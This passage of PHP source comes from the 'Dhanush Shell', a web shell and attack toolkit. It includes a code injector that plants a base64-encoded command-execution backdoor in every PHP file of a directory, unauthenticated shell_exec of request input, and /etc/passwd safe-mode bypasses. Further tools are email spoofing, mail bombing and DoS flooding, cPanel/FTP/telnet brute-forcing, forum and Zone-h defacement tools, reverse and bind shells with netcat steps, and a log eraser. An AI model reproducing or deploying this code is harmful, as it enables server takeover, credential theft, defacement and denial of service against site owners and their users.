3106 <td style="width:10%;">From</td>
3107 <td style="width:80%;" align="left"><input name="from" class="box" value="Hello@abcd.in" onFocus="if(this.value == 'president@whitehouse.gov')this.value = '';" onBlur="if(this.value=='')this.value='president@whitehouse.gov';"/></td>
3108 </tr>
3109
3110 <tr>
3111 <td style="width:20%;">To</td>
3112 <td style="width:80%;"><input class="box" class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/></td>
3113 </tr>
3114
3115 <tr>
3116 <td style="width:20%;">Subject</td>
3117 <td style="width:80%;"><input type="text" class="box" name="subject" value="Dhanush Here!!" onFocus="if(this.value == 'Dhanush Here!!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!!';" /></td>
3118 </tr>
3119
3120
3121 <tr>
3122 <td colspan="2">
3123 <textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!!</textarea>
3124 </td>
3125 </tr>
3126
3127
3128 <tr>
3129 <td rowspan="2">
3130 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('massmailing',to.value,subject.value,message.value,from.value)" class="but" value=" Send! "/>
3131 </td>
3132 </tr>
3133 </table>
3134 </form></div>
3135 <?php
3136}
3137// Get Domains
3138else if(isset($_REQUEST["symlinkserver"]))
3139{
3140 ?>
3141 <center><table><tr>
3142 <td><a href=javascript:void(0) onClick="getdata('domains')"><font class=txt><b>| Get Domains |</b></font></a></td>
3143 <td><a href=javascript:void(0) onClick="getdata('symlink')"><font class=txt><b>| Symlink Server |</b></font></a></td>
3144 <td><a href=javascript:void(0) onClick="getdata('symlinkfile')"><font class=txt><b>| Symlink File |</b></font></a></td>
3145 <td><a href=javascript:void(0) onClick="getdata('script')"><font class=txt><b>| Script Locator |</b></font></a></td>
3146 </tr></table></center><br>
3147 <div id="showdata"></div><?php
3148}
3149// Forum Manager
3150else if(isset($_REQUEST["forum"]))
3151{ ?>
3152 <center><table><tr><td><a href=# onClick="getdata('defaceforum')"><font class=txt size="4">| Forum Defacer |</font></a></td>
3153 <td><a href=# onClick="getdata('passwordchange')"><font class=txt size="4">| Forum Password Changer |</font></a></td>
3154 </tr></table></center><br><div id="showdata"></div>
3155 <?php
3156}
3157// Sec info
3158else if(isset($_GET['secinfo']))
3159{ ?><div id=showdata></div>
3160<center><div id="showmydata"></div>
3161</center>
3162<br><center><font color =red size=5>Server security information</font><br><br></center>
3163 <table style="width:100%;border-color:#333333;" border="1">
3164 <tr>
3165 <td style="width:7%;">Curl</td>
3166 <td style="width:7%;">Oracle</td>
3167 <td style="width:7%;">MySQL</td>
3168 <td style="width:7%;">MSSQL</td>
3169 <td style="width:7%;">PostgreSQL</td>
3170 <td style="width:12%;">Open Base Directory</td>
3171 <td style="width:10%;">Safe_Exec_Dir</td>
3172 <td style="width:7%;">PHP Version</td>
3173 <td style="width:7%;">Magic Quotes</td>
3174 <td style="width:7%;">Server Admin</td>
3175 </tr>
3176 <tr>
3177 <td style="width:7%;"><font class="txt"><?php curlinfo(); ?></font></td>
3178 <td style="width:7%;"><font class="txt"><?php oracleinfo(); ?></font></td>
3179 <td style="width:7%;"><font class="txt"><?php mysqlinfo(); ?></font></td>
3180 <td style="width:7%;"><font class="txt"><?php mssqlinfo(); ?></font></td>
3181 <td style="width:7%;"><font class="txt"><?php postgresqlinfo(); ?></font></td>
3182 <td style="width:12%;"><font class="txt"><?php echo $basedir; ?></font></td>
3183 <td style="width:10%;"><font class="txt"><?php if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font >NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};} ?></font></td>
3184 <td style="width:7%;"><font class="txt"><?php phpver(); ?></font></td>
3185 <td style="width:7%;"><font class="txt"><?php magic_quote(); ?></font></td>
3186 <td style="width:7%;"><font class="txt"><?php serveradmin(); ?></font></td>
3187 </tr>
3188</table><br> <?php
3189 mysecinfo();
3190}
3191// Code Injector
3192
3193else if(isset($_GET['injector']))
3194{
3195 ?>
3196 <form method='POST'>
3197 <table id="margins">
3198 <tr>
3199 <td width="100" class="title">
3200 Directory
3201 </td>
3202 <td>
3203 <input class="box" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>" />
3204 </td>
3205
3206 </tr>
3207 <tr>
3208 <td class="title">
3209 Mode
3210 </td>
3211 <td>
3212 <select style="width: 400px;" name="mode" class="box">
3213 <option value="Apender">Apender</option>
3214 <option value="Overwriter">Overwriter</option>
3215 </select>
3216 </td>
3217 </tr>
3218 <tr>
3219 <td class="title">
3220 File Type
3221 </td>
3222 <td>
3223 <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
3224 </td>
3225 </tr>
3226 <tr>
3227 <td>Create A backdoor by injecting this code in every php file of current directory</td>
3228 </tr>
3229
3230 <tr>
3231 <td colspan="2">
3232 <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode("PD9waHAgJGNtZCA9IDw8PEVPRA0KY21kDQpFT0Q7DQoNCmlmKGlzc2V0KCRfUkVRVUVTVFskY21kXSkpIHsNCnN5c3RlbSgkX1JFUVVFU1RbJGNtZF0pOyB9ID8+"); ?></textarea>
3233 </td>
3234 </tr>
3235 <tr>
3236 <td rowspan="2">
3237 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="codeinjector(pathtomass.value,mode.value,filetype.value,injectthis.value)" class="but" value="Inject "/>
3238 </td>
3239 </tr>
3240 </form>
3241 </table><div id="showinject"</div>
3242 <?php
3243}
3244// Bypass
3245else if(isset($_GET["bypass"]))
3246{
3247 ?><center><div id="showbyp"></div></center>
3248 <table cellpadding="7" align="center" border="3" style="width:70%;border-color:#333333;">
3249 <tr>
3250 <td align="center" colspan="2"><font color="#FF0000" size="3">Safe mode bypass</font></td>
3251 </tr>
3252 <tr>
3253 <td align="center">
3254 <p>Using copy() function</p>
3255 <form onSubmit="bypassfun('copy',copy.value);return false;">
3256 <input type="text" name="copy" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('copy',copy.value)" value="bypass" class="but">
3257 </form>
3258 </td>
3259 <td align="center">
3260 <p>Using imap() function</p>
3261 <form onSubmit="bypassfun('imap',imap.value);return false;">
3262 <input type="text" name="imap" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('imap',imap.value)" value="bypass" class="but">
3263 </form>
3264 </td>
3265 </tr>
3266
3267 <tr>
3268 <td align="center">
3269 <p>Using sql() function</p>
3270 <form onSubmit="bypassfun('sql',sql.value);return false;">
3271 <input type="text" name="sql" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('sql',sql.value)" value="bypass" class="but">
3272 </form>
3273 </td>
3274 <td align="center">
3275 <p>Using Curl() function</p>
3276 <form onSubmit="bypassfun('curl',curl.value);return false;">
3277 <input type="text" name="curl" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('curl',curl.value)" value="bypass" class="but">
3278 </form>
3279 </td>
3280 </tr>
3281
3282 <tr>
3283 <td align="center">
3284 <p>Bypass using include()</p>
3285 <form onSubmit="bypassfun('include',include.value);return false;">
3286 <input type="text" name="include" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('include',include.value)" value="bypass" class="but">
3287 </form>
3288 </td>
3289 <td align="center">
3290 <p>Using id() function</p>
3291 <form onSubmit="bypassfun('id',id.value);return false;">
3292 <input type="text" name="id" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('id',id.value)" value="bypass" class="but">
3293 </form>
3294 </td>
3295 </tr>
3296
3297 <tr>
3298 <td align="center">
3299 <p>Using tempnam() function</p>
3300 <form onSubmit="bypassfun('tempnam',tempname.value);return false;">
3301 <input type="text" name="tempname" value="../../../etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('tempnam',tempname.value)" value="bypass" class="but">
3302 </form>
3303 </td>
3304 <td align="center">
3305 <p>Using symlink() function</p>
3306 <form onSubmit="bypassfun('symlnk',sym.value);return false;">
3307 <input type="text" name="sym" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('symlnk',sym.value)" value="bypass" class="but">
3308 </form>
3309 </td>
3310 </tr>
3311 <tr>
3312 <td colspan=2 align="center">
3313 <p>Using Bypass function</p>
3314 <form onSubmit="bypassfun('newtype',newtype.value,optiontype.value);return false;">
3315 <input type="text" name="newtype" value="/etc/passwd" class="sbox">
3316 <select id="optiontype" class=sbox>
3317 <option value="tac">tac</option>
3318 <option value="more">more</option>
3319 <option value="less">less</option>
3320 <option value="rev">rev</option>
3321 <option value="xxd">xxd</option>
3322 </select>
3323 <input type="button" OnClick="bypassfun('newtype',newtype.value,optiontype.value)" value="bypass" class="but">
3324 </form>
3325 </td>
3326 </tr>
3327 </table>
3328 </form>
3329 <?php
3330}
3331//fuzzer
3332else if(isset($_GET['fuzz']))
3333{
3334 ?>
3335 <form method="GET">
3336 <table id="margins">
3337 <tr>
3338 <td width="400" class="title">
3339 IP
3340 </td>
3341 <td>
3342 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
3343 </td>
3344 </tr>
3345
3346 <tr>
3347 <td class="title">
3348 Port
3349 </td>
3350 <td>
3351 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
3352 </td>
3353 </tr>
3354
3355 <tr>
3356 <td class="title">
3357 Timeout
3358 </td>
3359 <td>
3360 <input type="text" class="box" name="time" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';"/>
3361 </td>
3362 </tr>
3363
3364
3365 <tr>
3366 <td class="title">
3367 No of times
3368 </td>
3369 <td>
3370 <input type="text" class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';" />
3371 </td>
3372 </tr>
3373
3374 <tr>
3375 <td class="title">
3376 Message (The message Should be long and it will be multiplied with the value after it)
3377 </td>
3378 <td>
3379 <input class="box" name="message" value="%S%x--Some Garbage here --%x%S" onFocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onBlur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
3380 </td>
3381 <td>
3382 x
3383 </td>
3384 <td width="20">
3385 <input style="width: 30px;" class="box" name="messageMultiplier" value="10" />
3386 </td>
3387 </tr>
3388
3389 <tr>
3390 <td rowspan="2">
3391 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('fuzzer',myip.value,port.value,time.value,times.value,message.value,messageMultiplier.value)" class="but" value=" Submit "/>
3392 </td>
3393 </tr>
3394 </table>
3395 </form><div id="showdos"></div>
3396 <?php
3397}
3398// Zone-h Poster
3399 else if(isset($_GET["zone"]))
3400 {
3401 if(!function_exists('curl_version'))
3402 {
3403 echo "<pre style='margin-top:5px'><center><font >PHP CURL NOT EXIST</font></center></pre>";
3404 }
3405 ?>
3406 <center><font size="4" color="#FF0000">Zone-h Poster</font></center>
3407 <form action="<?php echo $self; ?>" method="post">
3408 <table align="center" cellpadding="5" border="0">
3409 <tr>
3410 <td>
3411 <input type="text" name="defacer" value="Attacker" class="box" /></td></tr>
3412 <tr><td>
3413 <select name="hackmode" class="box">
3414 <option >--------SELECT--------</option>
3415 <option value="1">known vulnerability (i.e. unpatched system)</option>
3416 <option value="2" >undisclosed (new) vulnerability</option>
3417 <option value="3" >configuration / admin. mistake</option>
3418 <option value="4" >brute force attack</option>
3419 <option value="5" >social engineering</option>
3420 <option value="6" >Web Server intrusion</option>
3421 <option value="7" >Web Server external module intrusion</option>
3422 <option value="8" >Mail Server intrusion</option>
3423 <option value="9" >FTP Server intrusion</option>
3424 <option value="10" >SSH Server intrusion</option>
3425 <option value="11" >Telnet Server intrusion</option>
3426 <option value="12" >RPC Server intrusion</option>
3427 <option value="13" >Shares misconfiguration</option>
3428 <option value="14" >Other Server intrusion</option>
3429 <option value="15" >SQL Injection</option>
3430 <option value="16" >URL Poisoning</option>
3431 <option value="17" >File Inclusion</option>
3432 <option value="18" >Other Web Application bug</option>
3433 <option value="19" >Remote administrative panel access bruteforcing</option>
3434 <option value="20" >Remote administrative panel access password guessing</option>
3435 <option value="21" >Remote administrative panel access social engineering</option>
3436 <option value="22" >Attack against administrator(password stealing/sniffing)</option>
3437 <option value="23" >Access credentials through Man In the Middle attack</option>
3438 <option value="24" >Remote service password guessing</option>
3439 <option value="25" >Remote service password bruteforce</option>
3440 <option value="26" >Rerouting after attacking the Firewall</option>
3441 <option value="27" >Rerouting after attacking the Router</option>
3442 <option value="28" >DNS attack through social engineering</option>
3443 <option value="29" >DNS attack through cache poisoning</option>
3444 <option value="30" >Not available</option>
3445 </select>
3446 </td></tr>
3447 <tr><td>
3448 <select name="reason" class="box">
3449 <option >--------SELECT--------</option>
3450 <option value="1" >Heh...just for fun!</option>
3451 <option value="2" >Revenge against that website</option>
3452 <option value="3" >Political reasons</option>
3453 <option value="4" >As a challenge</option>
3454 <option value="5" >I just want to be the best defacer</option>
3455 <option value="6" >Patriotism</option>
3456 <option value="7" >Not available</option>
3457 </select></td></tr>
3458 <tr><td>
3459 <textarea name="domain" class="box" cols="47" rows="9">List Of Domains</textarea></td></tr>
3460 <tr><td>
3461 <input type="button" onClick="zoneh(defacer.value,hackmode.value,reason.value,domain.value)" class="but" value="Send Now !" /></td></tr></table>
3462 </form><div id="showzone"></div>
3463 <?php }
3464//DDos
3465 else if(isset($_GET['dos']))
3466 {
3467 ?>
3468 <form method="GET">
3469 <table id="margins">
3470 <tr>
3471 <td width="400" class="title">
3472 IP
3473 </td>
3474 <td>
3475 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
3476 </td>
3477 </tr>
3478
3479 <tr>
3480 <td class="title">
3481 Port
3482 </td>
3483 <td>
3484 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
3485 </td>
3486 </tr>
3487
3488 <tr>
3489 <td class="title">
3490 Timeout <font >(Time in seconds)</font>
3491 </td>
3492 <td>
3493 <input type="text" class="box" name="timeout" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';" />
3494 </td>
3495 </tr>
3496 <tr>
3497 <td class="title">
3498 Execution Time <font >(Time in seconds)</font>
3499 </td>
3500 <td>
3501 <input type="text" class="box" name="exTime" value="10" onFocus="if(this.value == '10')this.value = '';" onBlur="if(this.value=='')this.value='10';"/>
3502 </td>
3503 </tr>
3504 <tr>
3505 <td class="title">
3506 No of Bytes per/packet
3507 </td>
3508 <td>
3509 <input type="text" class="box" name="noOfBytes" value="999999" onFocus="if(this.value == '999999')this.value = '';" onBlur="if(this.value=='')this.value='999999';"/>
3510 </td>
3511 </tr>
3512 <tr>
3513 <td rowspan="2">
3514 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('dosser',myip.value,port.value,timeout.value,exTime.value,noOfBytes.value,'null')" class="but" value=" Attack >> "/>
3515 </td>
3516 </tr>
3517 </table>
3518 </form><div id="showdos"></div>
3519 <?php
3520}
3521else if(isset($_GET['mailbomb']))
3522{ ?>
3523 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('bomb')"><font class=txt size="4">| Mail Bomber |</font></a></td>
3524 <td><a href=javascript:void(0) onClick="getdata('mail')"><font class=txt size="4">| Mass Mailer |</font></a></td></tr></table></center><br><div id=showdata></div>
3525<?php
3526}
3527else if(isset($_GET['tools']))
3528 {
3529 ?>
3530 <center><br><form onSubmit="getport(host.value,protocol.value);return false;">
3531 <table cellpadding="5" border="3" style="border-color:#333333; width:50%;">
3532 <tr>
3533 <td colspan="2" align="center"><b><font size='4' color="#FF0000">Port Scanner<br></font></b></td>
3534 </tr>
3535 <tr>
3536 <td align="center">
3537 <input class="sbox" type='text' name='host' value='<?php echo $_SERVER["SERVER_ADDR"]; ?>' >
3538 </td>
3539 <td align="center">
3540 <select class="sbox" name='protocol'>
3541 <option value='tcp'>tcp</option>
3542 <option value='udp'>udp</option>
3543 </select>
3544 </td>
3545 <tr>
3546 <td colspan="2" align="center"><input class="but" type='button' onClick="getport(host.value,protocol.value)" value='Scan Ports'></td>
3547 </tr>
3548 </form>
3549 <tr><td colspan=2><div id="showports"></div>
3550 </td></tr></table>
3551
3552 <br>
3553 <form onSubmit="bruteforce(prototype.value,serverport.value,login.value,dict.value);return false;">
3554 <table cellpadding="5" border="2" style="border-color:#333333; width:50%;">
3555 <tr>
3556 <td colspan="2" align="center"><font size="4">BruteForce</font></td>
3557 </tr>
3558 <tr>
3559 <td>Type : </td>
3560 <td>
3561 <select name="prototype" class="sbox">
3562 <option value="ftp">FTP</option>
3563 <option value="mysql">MYSQL</option>
3564 <option value="postgresql">PostgreSql</option>
3565 </select>
3566 </td>
3567 </tr>
3568 <tr>
3569 <td>Server <b>:</b> Port : </td>
3570 <td><input type="text" name="serverport" value="<?php echo $_SERVER["SERVER_ADDR"]; ?>" class="sbox"></td>
3571 </tr>
3572 <tr>
3573 <td valign="middle">Brute type : </td>
3574 <td><label><input type=radio name=mytype value="1" checked> /etc/passwd</label><label><input type=checkbox id="reverse" name=reverse value=1 checked> reverse (login -> nigol)</label><hr color="#1B1B1B">
3575 <label><input type=radio name=mytype value="2"> Dictionary</label><br>
3576 Login : <input type="text" name="login" value="root" class="sbox"><br>
3577 Dictionary : <input type="text" name="dict" value="<?php echo getcwd() . $directorysperator; ?>passwd.txt" class="sbox">
3578 </td>
3579 </tr>
3580 <tr>
3581 <td colspan="2" align="center"><input type="button" onClick="bruteforce(prototype.value,serverport.value,login.value,dict.value)" value="Attack >>" class="but"></td>
3582 </tr>
3583 </form><tr><td colspan="2" id="showbrute"></td></tr>
3584 </table>
3585 </center><br>
3586 <?php
3587}
3588else if (isset($_GET["phpc"]))
3589{
3590 ?>
3591 <div id="showresult"></div>
3592 <form name="frm">
3593 <textarea name="code" class="box" cols="120" rows="10">phpinfo();</textarea>
3594 <br /><br />
3595 <input name="submit" value="Execute This COde! " class="but" onClick="execode(code.value)" type="button" />
3596 <label><input type="checkbox" id="intext" name="intext" value="disp"> <font class=txt size="3">Display in Textarea</font></label>
3597 </form>
3598 <?php
3599}
3600else if(isset($_GET["exploit"]))
3601{
3602 if(!isset($_GET["rootexploit"]))
3603 {
3604 ?>
3605 <center>
3606 <form action="<?php echo $self; ?>" method="get" target="_blank">
3607 <input type="hidden" name="exploit">
3608 <table border="1" cellpadding="5" cellspacing="4" style="width:50%;border-color:#333333;">
3609 <tr>
3610 <td style="height:60px;">
3611 <font size="4" class=txt>Select Website</font></td><td>
3612 <p><select id="rootexploit" name="rootexploit" class="box">
3613 <option value="exploit-db">Exploit-db</option>
3614 <option value="packetstormsecurity">Packetstormsecurity</option>
3615 <option value="exploitsearch">Exploitsearch</option>
3616 <option value="shodanhq">Shodanhq</option>
3617 </select></p></td></tr><tr><td colspan="2" align="center" style="height:40px;">
3618 <input type="submit" value="Search" class="but"></td></tr></table>
3619 </form></center><br>
3620
3621 <?php
3622 }
3623 else
3624 {
3625 //exploit search
3626 $Lversion = php_uname(r);
3627 $OSV = php_uname(s);
3628 if(eregi('Linux',$OSV))
3629 {
3630 $Lversion=substr($Lversion,0,6);
3631 if($_GET['rootexploit'] == "exploit-db")
3632 {
3633 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=Linux+Kernel+$Lversion");
3634 }
3635 else if($_GET['rootexploit'] == "packetstormsecurity")
3636 {
3637 header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=Linux+Kernel+$Lversion");
3638 }
3639 else if($_GET['rootexploit'] == "exploitsearch")
3640 {
3641 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=Linux+Kernel+$Lversion");
3642 }
3643 else if($_GET['rootexploit'] == "shodanhq")
3644 {
3645 header("Location:http://www.shodanhq.com/exploits?q=Linux+Kernel+$Lversion");
3646 }
3647 }
3648 else
3649 {
3650 $Lversion=substr($Lversion,0,3);
3651 if($_GET['rootexploit'] == "exploit-db")
3652 {
3653 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$OSV+Lversion");
3654 }
3655 else if($_GET['rootexploit'] == "packetstormsecurity")
3656 {
3657 header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=$OSV+Lversion");
3658 }
3659 else if($_GET['rootexploit'] == "exploitsearch")
3660 {
3661 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=$OSV+Lversion");
3662 }
3663 else if($_GET['rootexploit'] == "shodanhq")
3664 {
3665 header("Location:http://www.shodanhq.com/exploits?q=$OSV+Lversion");
3666 }
3667 }
3668 //End of Exploit search
3669 }
3670}
3671// Connect
3672else if(isset($_REQUEST['connect']))
3673{
3674 ?>
3675 <form action='<?php echo $self; ?>' method='POST' >
3676 <table style="width:50%" align="center" >
3677 <tr>
3678 <th colspan="1" width="50px">Reverse Shell</th>
3679 <th colspan="1" width="50px">Bind Shell</th>
3680 </tr>
3681 <tr>
3682 <td>
3683 <table style="border-spacing: 6px;">
3684 <tr>
3685 <td>IP </td>
3686 <td>
3687 <input type="text" class="box" style="width: 200px;" name="ip" value="<?php yourip();?>" />
3688 </td>
3689 </tr>
3690 <tr>
3691 <td>Port </td>
3692 <td><input style="width: 200px;" class="box" name="port" size='5' value="9891"/></td>
3693 </tr>
3694 <tr>
3695 <td style="vertical-align:top;">Use:</td>
3696 <td><select style="width: 95px;" name="lang" class="sbox">
3697 <option value="perl">Perl</option>
3698 <option value="python">Python</option>
3699 <option value="php">PHP</option>
3700 </select>
3701 <input type="submit" style="width: 90px;" class="but" value="Connect!" name="backconnect"/></td>
3702 </tr>
3703 </table> </form>
3704 </td>
3705
3706 <td style="vertical-align:top;">
3707 <form method='post' >
3708 <table style="border-spacing: 6px;">
3709 <tr>
3710 <td>Port</td>
3711 <td>
3712 <input style="width: 200px;" class="box" name="port" value="9891" />
3713 </td>
3714 </tr>
3715 <tr>
3716 <td>Password </td>
3717 <td>
3718 <input style="width: 200px;" class="box" name="passwd" value="Dhanush"/>
3719 </td>
3720 <tr>
3721 <td>Using</td>
3722 <td>
3723 <select style="width: 95px;" name="lang" id="lang" class="sbox">
3724 <option value="perl">Perl</option>
3725 <option value="c">C</option>
3726 </select>
3727 <input style="width: 90px;" class="but" type="submit" name="backdoor" value=" Bind "/></td>
3728 </tr>
3729 </table>
3730 </td>
3731 </form>
3732 </tr>
3733 <tr><td colspan=2><font color="#FF0000">Click "Connect" only after open port for it.Use NetCat, run "nc -l -n -v -p 9891"!<br>Click "Bind", use netcat and give it the command 'nc <?php yourip(); ?> 9891"!</font></td></tr>
3734 </table>
3735
3736 <?php
3737 }
3738
3739else if(isset($_REQUEST['404']))
3740{
3741 ?>
3742 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('404new')"><font class=txt size="4">| Set Your 404 Page |</font></a></td>
3743 <td><a href=javascript:void(0) onClick="getdata('404page')"><font class=txt size="4">| Set Specified 404 Page |</font></a></td>
3744 </tr></table></center><br>
3745 <div id="showdata"></div>
3746 <?php
3747}
3748else if(isset($_GET['about']))
3749 { ?>
3750 <center>
3751 <p><font size=6><u>D h a n u s h</u></font><br>
3752 <font size=5>[--==Coded By Arjun==--]</font>
3753 <div style='font-family: Courier New; font-size: 10px;'><font class=txt ><pre>
3754
3755 - -- -
3756 -- -- --
3757 -- --
3758 --- ---
3759 ------
3760 ----
3761 ----
3762 ------
3763-------
3764--- --
3765 -- ---
3766 -- -----
3767 --- --- ---
3768 --- --- ---
3769-- --------- --
3770-- ------- --
3771 -- ---- --
3772 -- --- --
3773 -- -- --
3774 --- --- -- ---
3775 ------ ------
3776 ---- ----
3777
3778
3779 </pre></font></div></center>
3780 <font class="txt">Dhanush Shell is a PHP Script, created for checking the vulnerability and security of any web server or website. With this PHP script, the owner can check various vulnerablities present in the web server. This shell provide you almost every facility that the security analyst need for penetration testing. This is a "All In One" php script, so that the user do not need to go anywhere else.<br> This script is coded by an Indian Ethical Hacker.<br> This script is only coded for education purpose or testing on your own server.The developer of the script is not responsible for any damage or misuse of it</font><br><br><center><font size=5>GREETZ To All Indian Hackers</font><br><font size=6>| जय महाकाल | | जय हिन्द |</font></center><br>
3781 <?php }
3782else if(isset($_GET['database']))
3783{ ?>
3784 <form onSubmit="mydatabase(server.value,username.value,password.value);return false;">
3785 <table id="datatable" style="width:90%;" cellpadding="4" align="center">
3786 <tr>
3787 <td colspan="2">Connect To Database</td>
3788 </tr>
3789 <tr>
3790 <td>Server Address :</td>
3791 <td><input type="text" class="box" name="server" value="localhost"></td>
3792 </tr>
3793 <tr>
3794 <td>Username :</td>
3795 <td><input type="text" class="box" name="username" value="root"></td>
3796 </tr>
3797 <tr>
3798 <td>Password:</td>
3799 <td><input type="text" class="box" name="password" value=""></td>
3800 </tr>
3801
3802 <tr>
3803 <td></td>
3804 <td><input type="button" onClick="mydatabase(server.value,username.value,password.value)" value=" Connect " name="executeit" class="but"></td>
3805 </tr>
3806 </table>
3807 </form>
3808 <div id="showsql"></div>
3809<?php
3810}
3811// Cpanel Cracker
3812 else if(isset($_REQUEST['cpanel']))
3813 {
3814 $cpanel_port="2082";
3815 $connect_timeout=5;
3816 ?>
3817 <center>
3818 <form method=post>
3819 <table style="width:50%;border-color:#333333;" border=1 cellpadding=4>
3820 <tr>
3821 <td align=center colspan=2>Target : <input type=text name="server" value="localhost" class=sbox></td>
3822 </tr>
3823 <tr>
3824 <td align=center>User names</td><td align=center>Password</td>
3825 </tr>
3826 <tr>
3827 <td align=center><textarea name=username rows=25 cols=22 class=box><?php
3828 if($os != "Windows")
3829 {
3830 if(@file('/etc/passwd'))
3831 {
3832 $users = file('/etc/passwd');
3833 foreach($users as $user)
3834 {
3835 $user = explode(':', $user);
3836 echo $user[0] . "\n";
3837 }
3838 }
3839 else
3840 {
3841 $temp = "";
3842 $val1 = 0;
3843 $val2 = 1000;
3844 for(;$val1 <= $val2;$val1++)
3845 {
3846 $uid = @posix_getpwuid($val1);
3847 if ($uid)
3848 $temp .= join(':',$uid)."\n";
3849 }
3850
3851 $temp = trim($temp);
3852
3853 if($file5 = fopen("test.txt","w"))
3854 {
3855 fputs($file5,$temp);
3856 fclose($file5);
3857
3858 $file = fopen("test.txt", "r");
3859 while(!feof($file))
3860 {
3861 $s = fgets($file);
3862 $matches = array();
3863 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
3864 $matches = str_replace("home/","",$matches[1]);
3865 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
3866 continue;
3867 echo $matches;
3868 }
3869 fclose($file);
3870 }
3871 }
3872 }
3873
3874 ?></textarea></td><td align=center><textarea name=password rows=25 cols=22 class=box></textarea></td>
3875 </tr>
3876 <tr>
3877 <td align=center colspan=2>Guess options : <label><input name="cracktype" type="radio" value="cpanel" checked> Cpanel(2082)</label><label><input name="cracktype" type="radio" value="ftp"> Ftp(21)</label><label><input name="cracktype" type="radio" value="telnet"> Telnet(23)</label></td>
3878 </tr>
3879 <tr>
3880 <td align=center colspan=2>Timeout delay : <input type="text" name="delay" value=5 class=sbox></td>
3881 </tr>
3882 <tr>
3883 <td align=center colspan=2><input type="submit" name="cpanelattack" value=" Go " class=but></td>
3884 </tr>
3885 </table>
3886 </form>
3887 </center>
3888 <?php
3889}
3890else if(isset($_REQUEST['malattack']))
3891{
3892 ?><input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
3893 <center><table><tr><td><a href=# onClick="getdata('malware')"><font class=txt size="4">| Malware Attack |</font></a></td>
3894 <td><a href=# onClick="getdata('codeinsert')"><font class=txt size="4">| Insert Own Code |</font></a></td></tr></table></center><br>
3895 <div id="showdata"></div>
3896 <?php
3897}
3898else if(isset($_GET["com"]))
3899{
3900 echo "<br>";
3901 ob_start();
3902 eval("phpinfo();");
3903 $b = ob_get_contents();
3904 ob_end_clean();
3905 $a = strpos($b,"<body>")+6; // yeah baby,, your body is wonderland ;-)
3906 $z = strpos($b,"</body>");
3907 $s_result = "<div class='myphp'>".substr($b,$a,$z-$a)."</div>";
3908 echo $s_result;
3909}
3910else if(isset($_GET['execute']))
3911{
3912 $comm = $_GET['execute'];
3913 chdir($_GET['executepath']);
3914 $check = shell_exec($comm);
3915
3916 echo "<center><textarea id=showexecute cols=120 rows=20 class=box>" . $check . "</textarea></center>";
3917
3918 ?>
3919 <BR><BR><center><form onSubmit="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value);return false;">
3920 <input type="text" class="box" name="execute">
3921 <input type="button" onClick="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value)" value="Execute" class="but"></form></center>
3922 <?php
3923}
3924else if(isset($_GET['mycmd']))
3925{
3926 if($_GET['mycmd']=="logeraser")
3927 {
